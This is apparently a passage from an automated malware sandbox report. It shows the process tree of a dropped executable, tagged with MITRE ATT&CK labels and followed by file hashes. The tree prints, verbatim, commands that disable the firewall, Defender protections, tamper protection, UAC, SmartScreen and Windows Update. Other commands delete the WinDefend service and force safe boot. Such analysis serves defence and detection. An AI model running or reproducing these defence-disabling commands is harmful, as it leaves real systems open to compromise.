                                                        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
                                                        2⤵
                                                          PID:4392
                                                          • C:\Windows\system32\reg.exe
                                                            reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
                                                            3⤵
                                                            • Modifies firewall policy service
                                                            PID:688
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"
                                                          2⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:776
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
                                                          2⤵
                                                            PID:1096
                                                            • C:\Windows\system32\reg.exe
                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
                                                              3⤵
                                                                PID:3868
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU' -Name 'NoAutoUpdate' -Value 1"
                                                              2⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1308
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} safeboot minimal
                                                              2⤵
                                                                PID:6048
                                                                • C:\Windows\system32\bcdedit.exe
                                                                  bcdedit /set {current} safeboot minimal
                                                                  3⤵
                                                                  • Modifies boot configuration data using bcdedit
                                                                  PID:5688
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 67108863 /f > nul
                                                                2⤵
                                                                  PID:5844
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 67108863 /f
                                                                    3⤵
                                                                    • Modifies registry key
                                                                    PID:4864
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 67108863 /f > nul
                                                                  2⤵
                                                                    PID:6092
                                                                    • C:\Windows\system32\reg.exe
                                                                      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
                                                                      3⤵
                                                                      • Modifies registry key
                                                                      PID:2592
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power" /v HiberbootEnabled /t REG_DWORD /d 0 /f
                                                                    2⤵
                                                                      PID:1068
                                                                      • C:\Windows\system32\reg.exe
                                                                        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power" /v HiberbootEnabled /t REG_DWORD /d 0 /f
                                                                        3⤵
                                                                          PID:4368
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /t REG_DWORD /d 1 /f
                                                                        2⤵
                                                                          PID:4424
                                                                          • C:\Windows\system32\reg.exe
                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /t REG_DWORD /d 1 /f
                                                                            3⤵
                                                                              PID:4416
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' -Name 'Notification_Suppress' -Value 1"
                                                                            2⤵
                                                                            • Command and Scripting Interpreter: PowerShell
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:6108
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\Policy" /v DisableNotifications /t REG_DWORD /d 1 /f
                                                                            2⤵
                                                                              PID:5436
                                                                              • C:\Windows\system32\reg.exe
                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\Policy" /v DisableNotifications /t REG_DWORD /d 1 /f
                                                                                3⤵
                                                                                  PID:4988
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\Policy' -Name 'DisableNotifications' -Value 1"
                                                                                2⤵
                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:1944
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /f /im OneDrive.exe & %SystemRoot%\SysWOW64\OneDriveSetup.exe /uninstall
                                                                                2⤵
                                                                                  PID:1408
                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                    taskkill /f /im OneDrive.exe
                                                                                    3⤵
                                                                                    • Kills process with taskkill
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:4636
                                                                                  • C:\Windows\SysWOW64\OneDriveSetup.exe
                                                                                    C:\Windows\SysWOW64\OneDriveSetup.exe /uninstall
                                                                                    3⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:4592
                                                                                    • C:\Windows\SysWOW64\OneDriveSetup.exe
                                                                                      "C:\Windows\SysWOW64\OneDriveSetup.exe" C:\Windows\SysWOW64\OneDriveSetup.exe /uninstall /permachine /childprocess /silent /enableOMCTelemetry /enableExtractCabV2 /cusid:S-1-5-21-814918696-1585701690-3140955116-1000
                                                                                      4⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:5168
                                                                                    • C:\Windows\SysWOW64\OneDriveSetup.exe
                                                                                      C:\Windows\SysWOW64\OneDriveSetup.exe /uninstall /peruser /childprocess /enableOMCTelemetry /enableExtractCabV2
                                                                                      4⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:4672
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /c schtasks /delete /tn "\Microsoft\Windows\OneDrive\OneDrive Reporting" /f
                                                                                  2⤵
                                                                                  • Indicator Removal: Clear Persistence
                                                                                  PID:4788
                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                    schtasks /delete /tn "\Microsoft\Windows\OneDrive\OneDrive Reporting" /f
                                                                                    3⤵
                                                                                      PID:5904
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR" /v EnableNetworkProtection /t REG_DWORD /d 0 /f
                                                                                    2⤵
                                                                                      PID:392
                                                                                      • C:\Windows\system32\reg.exe
                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR" /v EnableNetworkProtection /t REG_DWORD /d 0 /f
                                                                                        3⤵
                                                                                          PID:2960
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
                                                                                        2⤵
                                                                                          PID:1360
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
                                                                                            3⤵
                                                                                              PID:4000
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -EnableNetworkProtection Disabled"
                                                                                            2⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:980
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -EnableControlledFolderAccess Disabled"
                                                                                            2⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:4892
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d Off /f
                                                                                            2⤵
                                                                                              PID:5824
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d Off /f
                                                                                                3⤵
                                                                                                  PID:4048
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer' -Name 'SmartScreenEnabled' -Value 'Off'"
                                                                                                2⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:856
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 0 /f
                                                                                                2⤵
                                                                                                  PID:1552
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 0 /f
                                                                                                    3⤵
                                                                                                      PID:4104
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter' -Name 'EnabledV9' -Value 0"
                                                                                                    2⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:3140
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f
                                                                                                    2⤵
                                                                                                      PID:1496
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f
                                                                                                        3⤵
                                                                                                          PID:5476
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -PUAProtection Disabled"
                                                                                                        2⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        PID:4316
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c sc delete WinDefend
                                                                                                        2⤵
                                                                                                          PID:5864
                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                            sc delete WinDefend
                                                                                                            3⤵
                                                                                                            • Launches sc.exe
                                                                                                            PID:2376
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v NOC_GLOBAL_SETTING_ALLOW_TOASTS_ABOVE_LOCK /t REG_DWORD /d 0 /f
                                                                                                          2⤵
                                                                                                            PID:1716
                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                              reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v NOC_GLOBAL_SETTING_ALLOW_TOASTS_ABOVE_LOCK /t REG_DWORD /d 0 /f
                                                                                                              3⤵
                                                                                                                PID:5472
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v NOC_GLOBAL_SETTING_ALLOW_CRITICAL_TOASTS_ABOVE_LOCK /t REG_DWORD /d 0 /f
                                                                                                              2⤵
                                                                                                                PID:5032
                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                  reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v NOC_GLOBAL_SETTING_ALLOW_CRITICAL_TOASTS_ABOVE_LOCK /t REG_DWORD /d 0 /f
                                                                                                                  3⤵
                                                                                                                    PID:4072
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings' -Name 'NOC_GLOBAL_SETTING_ALLOW_TOASTS_ABOVE_LOCK' -Value 0"
                                                                                                                  2⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  PID:4160
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings' -Name 'NOC_GLOBAL_SETTING_ALLOW_CRITICAL_TOASTS_ABOVE_LOCK' -Value 0"
                                                                                                                  2⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  PID:2736
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowControlPanel /t REG_DWORD /d 0 /f
                                                                                                                  2⤵
                                                                                                                    PID:3664
                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      3⤵
                                                                                                                        PID:5688
                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowControlPanel /t REG_DWORD /d 0 /f
                                                                                                                        3⤵
                                                                                                                          PID:1420
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyComputer /t REG_DWORD /d 0 /f
                                                                                                                        2⤵
                                                                                                                          PID:2292
                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                            reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyComputer /t REG_DWORD /d 0 /f
                                                                                                                            3⤵
                                                                                                                              PID:4440
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyDocuments /t REG_DWORD /d 0 /f
                                                                                                                            2⤵
                                                                                                                              PID:2416
                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyDocuments /t REG_DWORD /d 0 /f
                                                                                                                                3⤵
                                                                                                                                  PID:4368
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyMusic /t REG_DWORD /d 0 /f
                                                                                                                                2⤵
                                                                                                                                  PID:5260
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyMusic /t REG_DWORD /d 0 /f
                                                                                                                                    3⤵
                                                                                                                                      PID:4608
                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyPictures /t REG_DWORD /d 0 /f
                                                                                                                                    2⤵
                                                                                                                                      PID:5844
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyPictures /t REG_DWORD /d 0 /f
                                                                                                                                        3⤵
                                                                                                                                          PID:4200
                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowRecentDocs /t REG_DWORD /d 0 /f
                                                                                                                                        2⤵
                                                                                                                                          PID:3280
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowRecentDocs /t REG_DWORD /d 0 /f
                                                                                                                                            3⤵
                                                                                                                                              PID:448
                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowRun /t REG_DWORD /d 0 /f
                                                                                                                                            2⤵
                                                                                                                                              PID:2656
                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowRun /t REG_DWORD /d 0 /f
                                                                                                                                                3⤵
                                                                                                                                                  PID:5408
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowSearch /t REG_DWORD /d 0 /f
                                                                                                                                                2⤵
                                                                                                                                                  PID:5220
                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowSearch /t REG_DWORD /d 0 /f
                                                                                                                                                    3⤵
                                                                                                                                                      PID:3548
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowUser /t REG_DWORD /d 0 /f
                                                                                                                                                    2⤵
                                                                                                                                                      PID:5692
                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowUser /t REG_DWORD /d 0 /f
                                                                                                                                                        3⤵
                                                                                                                                                          PID:5184
                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Features' -Name 'TamperProtection' -Value 0"
                                                                                                                                                        2⤵
                                                                                                                                                        • Modifies Windows Defender TamperProtection settings
                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                        PID:5700
                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t REG_DWORD /d 0 /f
                                                                                                                                                        2⤵
                                                                                                                                                          PID:2936
                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                            reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t REG_DWORD /d 0 /f
                                                                                                                                                            3⤵
                                                                                                                                                            • Modifies Windows Defender TamperProtection settings
                                                                                                                                                            PID:1564
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c NetSh Advfirewall set allprofiles state off
                                                                                                                                                          2⤵
                                                                                                                                                            PID:5832
                                                                                                                                                            • C:\Windows\system32\netsh.exe
                                                                                                                                                              NetSh Advfirewall set allprofiles state off
                                                                                                                                                              3⤵
                                                                                                                                                              • Modifies Windows Firewall
                                                                                                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                              PID:4488
                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f
                                                                                                                                                            2⤵
                                                                                                                                                              PID:4996
                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f
                                                                                                                                                                3⤵
                                                                                                                                                                • UAC bypass
                                                                                                                                                                PID:2104
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Features' -Name 'TamperProtection' -Value 0"
                                                                                                                                                              2⤵
                                                                                                                                                              • Modifies Windows Defender TamperProtection settings
                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                              PID:4376
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe
                                                                                                                                                            1⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:1200
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe
                                                                                                                                                            1⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:4696

                                                                                                                                                          Network

                                                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                                                          Replay Monitor

                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                          Downloads

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\0h4sagxy.p0j.exe.log

                                                                                                                                                            Filesize

                                                                                                                                                            660B

                                                                                                                                                            MD5

                                                                                                                                                            1c5e1d0ff3381486370760b0f2eb656b

                                                                                                                                                            SHA1

                                                                                                                                                            f9df6be8804ef611063f1ff277e323b1215372de

                                                                                                                                                            SHA256

                                                                                                                                                            f424c891fbc7385e9826beed2dd8755aeac5495744b5de0a1e370891a7beaf7a

                                                                                                                                                            SHA512

                                                                                                                                                            78f5fc40a185d04c9e4a02a3d1b10b4bd684c579a45a0d1e8f49f8dee9018ed7bc8875cbf21f98632f93ead667214a41904226ce54817b85caeeb4b0de54a743

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                            Filesize

                                                                                                                                                            2KB

                                                                                                                                                            MD5

                                                                                                                                                            6cf293cb4d80be23433eecf74ddb5503

                                                                                                                                                            SHA1

                                                                                                                                                            24fe4752df102c2ef492954d6b046cb5512ad408

                                                                                                                                                            SHA256

                                                                                                                                                            b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                                                                                                                                                            SHA512

                                                                                                                                                            0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                                                            Filesize

                                                                                                                                                            296B

                                                                                                                                                            MD5

                                                                                                                                                            f2f1090b7441250401495a50c6051c06

                                                                                                                                                            SHA1

                                                                                                                                                            9678d1ee41996b2a7d3fe7049d3cf589e3aefd06

                                                                                                                                                            SHA256

                                                                                                                                                            e1545ea5a989c4b717c45f6f8be4c21d9fb1bd5a4a520106668930ce73040b98

                                                                                                                                                            SHA512

                                                                                                                                                            d8ee737eeb762f79ccc1052baa8ffbb925ec3988317445aa516ce7c77b7f325983a47ce157200ba5ac8809330702aec7e2ccc4d4eb79fe9ff9778ac45cc1383f

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                            Filesize

                                                                                                                                                            1KB

                                                                                                                                                            MD5

                                                                                                                                                            eeb6ad386d143f278077171fc01a81e8

                                                                                                                                                            SHA1

                                                                                                                                                            43cff1bd7240965bfb2f10e47c0cec0f94332e2d

                                                                                                                                                            SHA256

                                                                                                                                                            59d62f9472b4c00b7cae0ee702789fa2b0042c468e4de9421d2430f9973eb00d

                                                                                                                                                            SHA512

                                                                                                                                                            b40f003e6d97adaaf05809f06d12df01984943d9eb6c44eaeffef90df8de0040373150c9714b11a42db5189b7064eeed0609a39f6f1feb91b05dd1835333e8f2

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                            Filesize

                                                                                                                                                            1KB

                                                                                                                                                            MD5

                                                                                                                                                            c1cca1eaf3605a34e79d047e2a85c328

                                                                                                                                                            SHA1

                                                                                                                                                            58dcc0e5d357f4b1aca1836a368e473aeba45cab

                                                                                                                                                            SHA256

                                                                                                                                                            bb5ecff4f61a42f032434828cfde49f13a0c5a01a911012b84a23c90c3d70175

                                                                                                                                                            SHA512

                                                                                                                                                            5ec798679a025d23499c5820536eeeb6caeceba8cc2bfafdaad5d38baa68069866b656039ea823f8256a5b1931fbc54426931e00ca943e09561195c412d4850b

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                            Filesize

                                                                                                                                                            1KB

                                                                                                                                                            MD5

                                                                                                                                                            a0f793b667a97083d819f06040446579

                                                                                                                                                            SHA1

                                                                                                                                                            851b789e096b1c8d83a793e8776e94a4ed366c35

                                                                                                                                                            SHA256

                                                                                                                                                            e3d06fa5e29f8459e13f8d395b7f1a469b9778c520dabcb4bbb1c1ecae563695

                                                                                                                                                            SHA512

                                                                                                                                                            de6ac39f0b6d5e9f00842725a2b452083342097c656568e0af9217e403e64d6acb50c1212650ba7bc4bc50534d8d483652e4a18a4a03d84cf1a829410d9e2bf2

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                            Filesize

                                                                                                                                                            1KB

                                                                                                                                                            MD5

                                                                                                                                                            cf1b06b44fb8bc1a4f25c85e70937782

                                                                                                                                                            SHA1

                                                                                                                                                            c4adeae41a97fc11d407c398040dd109873fb2e5

                                                                                                                                                            SHA256

                                                                                                                                                            04ddc18714503a6c256830af58a731df9d9ad479e87663787e0fa92424c9b743

                                                                                                                                                            SHA512

                                                                                                                                                            07fcfc741b14ef3551fdc53a08e31020fd9e1d43ab637535a11e318c9f8d48ea37cae3913539838e74299952a868a7824982ad5dc887992686d45050cc1fc7cf

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                            Filesize

                                                                                                                                                            1KB

                                                                                                                                                            MD5

